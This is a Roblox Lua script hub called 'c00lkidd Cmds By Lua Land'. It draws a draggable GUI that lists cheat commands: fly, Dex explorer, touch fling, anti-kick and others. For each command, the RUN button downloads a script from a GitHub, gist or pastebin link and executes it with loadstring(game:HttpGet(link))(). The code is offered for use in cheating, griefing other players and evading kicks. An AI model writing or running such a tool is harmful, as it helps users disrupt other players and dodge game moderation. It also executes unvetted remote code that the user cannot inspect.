local Players = game:GetService("Players")
local player = Players.LocalPlayer

local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "c00lkiddIntro"
gui.ResetOnSpawn = false

local introFrame = Instance.new("Frame", gui)
introFrame.Size = UDim2.new(0, 0, 0, 0)
introFrame.Position = UDim2.new(0.5, 0, 0.5, 0)
introFrame.AnchorPoint = Vector2.new(0.5, 0.5)
introFrame.BackgroundColor3 = Color3.new(0, 0, 0)
introFrame.BorderSizePixel = 0

local introText = Instance.new("TextLabel", introFrame)
introText.Size = UDim2.new(1, 0, 1, 0)
introText.BackgroundTransparency = 1
introText.Font = Enum.Font.SourceSansBold
introText.TextSize = 40
introText.TextColor3 = Color3.new(1, 0, 0)
introText.Text = "c00lkidd Cmds By Lua Land"
introText.TextScaled = true

introFrame:TweenSize(UDim2.new(0, 400, 0, 100), "Out", "Quad", 1, true)
wait(1)

for i = 1, 0, -0.05 do
	introFrame.BackgroundTransparency = 1 - i
	introText.TextTransparency = 1 - i
	wait(0.05)
end

introFrame:Destroy()

local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0, 400, 0, 360)
frame.Position = UDim2.new(0.5, -200, 0.5, -180)
frame.BackgroundColor3 = Color3.new(0, 0, 0)
frame.BorderColor3 = Color3.new(1, 0, 0)
frame.Active = true
frame.Draggable = true

local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, 0, 0, 40)
title.BackgroundTransparency = 1
title.Text = "c00lkidd Cmds By Lua Land"
title.Font = Enum.Font.SourceSansBold
title.TextSize = 24
title.TextColor3 = Color3.new(1, 0, 0)

spawn(function()
	while true do
		for i = 0, 1, 0.01 do
			title.TextColor3 = Color3.fromHSV(i, 1, 1)
			wait(0.05)
		end
	end
end)

local scroll = Instance.new("ScrollingFrame", frame)
scroll.Size = UDim2.new(1, -20, 0, 120)
scroll.Position = UDim2.new(0, 10, 0, 50)
scroll.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
scroll.BorderColor3 = Color3.new(1, 0, 0)
scroll.CanvasSize = UDim2.new(0, 0, 0, 200)
scroll.ScrollBarThickness = 6

local list = Instance.new("TextLabel", scroll)
list.Size = UDim2.new(1, -10, 0, 200)
list.Position = UDim2.new(0, 5, 0, 0)
list.BackgroundTransparency = 1
list.Font = Enum.Font.SourceSans
list.TextSize = 18
list.TextColor3 = Color3.new(1, 1, 1)
list.TextWrapped = true
list.TextYAlignment = Enum.TextYAlignment.Top
list.TextXAlignment = Enum.TextXAlignment.Left
list.Text = [[
COMMANDS:
Fly
Dex
Reset
Bunny Hop
Touch Fling
Sit
Anti-Kick
]]

local inputFrame = Instance.new("Frame", frame)
inputFrame.Size = UDim2.new(1, -20, 0, 40)
inputFrame.Position = UDim2.new(0, 10, 0, 180)
inputFrame.BackgroundColor3 = Color3.new(0, 0, 0)
inputFrame.BorderColor3 = Color3.new(1, 0, 0)
inputFrame.ClipsDescendants = true

local prefixLabel = Instance.new("TextLabel", inputFrame)
prefixLabel.Size = UDim2.new(0, 20, 1, 0)
prefixLabel.Position = UDim2.new(0, 5, 0, 0)
prefixLabel.BackgroundTransparency = 1
prefixLabel.Font = Enum.Font.SourceSansBold
prefixLabel.TextSize = 20
prefixLabel.TextColor3 = Color3.new(1, 0, 0)
prefixLabel.Text = "/"

local commandBox = Instance.new("TextBox", inputFrame)
commandBox.Size = UDim2.new(1, -30, 1, 0)
commandBox.Position = UDim2.new(0, 25, 0, 0)
commandBox.BackgroundTransparency = 1
commandBox.Font = Enum.Font.SourceSans
commandBox.TextSize = 20
commandBox.TextColor3 = Color3.new(1, 1, 1)
commandBox.Text = ""
commandBox.ClearTextOnFocus = false

commandBox:GetPropertyChangedSignal("Text"):Connect(function()
	if #commandBox.Text > 40 then
		commandBox.Text = commandBox.Text:sub(1, 40)
	end
end)

local run = Instance.new("TextButton", frame)
run.Size = UDim2.new(1, -20, 0, 40)
run.Position = UDim2.new(0, 10, 0, 230)
run.BackgroundColor3 = Color3.new(1, 0, 0)
run.Font = Enum.Font.SourceSansBold
run.TextSize = 20
run.TextColor3 = Color3.new(1, 1, 1)
run.Text = "RUN"

local commandLinks = {
	["fly"] = "https://raw.githubusercontent.com/XNEOFF/FlyGuiV3/main/FlyGuiV3.txt",
	["dex"] = "https://raw.githubusercontent.com/infyiff/backup/main/dex.lua",
	["reset"] = "https://gist.githubusercontent.com/Angelo-Gitland/9562e670b787b61196d83213c316e7e5/raw/c6c35f7f7924fe2f37e6a97c8fb191aec01caff9/ResetOi",
	["bunny hop"] = "https://gist.githubusercontent.com/Angelo-Gitland/3ba57e5a63b88874e0127c92de07a948/raw/450fad177e24e71b2ce425a8e1e865cc1edad435/Bunny%2520hop%2520script",
	["touch fling"] = "https://gist.githubusercontent.com/Angelo-Gitland/925545039c7de8f8860e3cfdfef177f1/raw/cee55dae0cb5599dc784d32864c9a9286b8a4e3f/freTouchDlfling",
	["sit"] = "https://gist.githubusercontent.com/Angelo-Gitland/fd84961c4c6e287e952a4dfd4f92ea19/raw/0d513eca1cb2e4e259f2e80c3bbe2c08b0a96ed3/Sit%2520script",
	["anti-kick"] = "https://pastebin.com/raw/ETxWjAPi",
}

run.MouseButton1Click:Connect(function()
	local input = commandBox.Text:lower()
	local link = commandLinks[input]
	if link then
		loadstring(game:HttpGet(link))()
	else
		warn("Unknown command: " .. input)
	end
end)
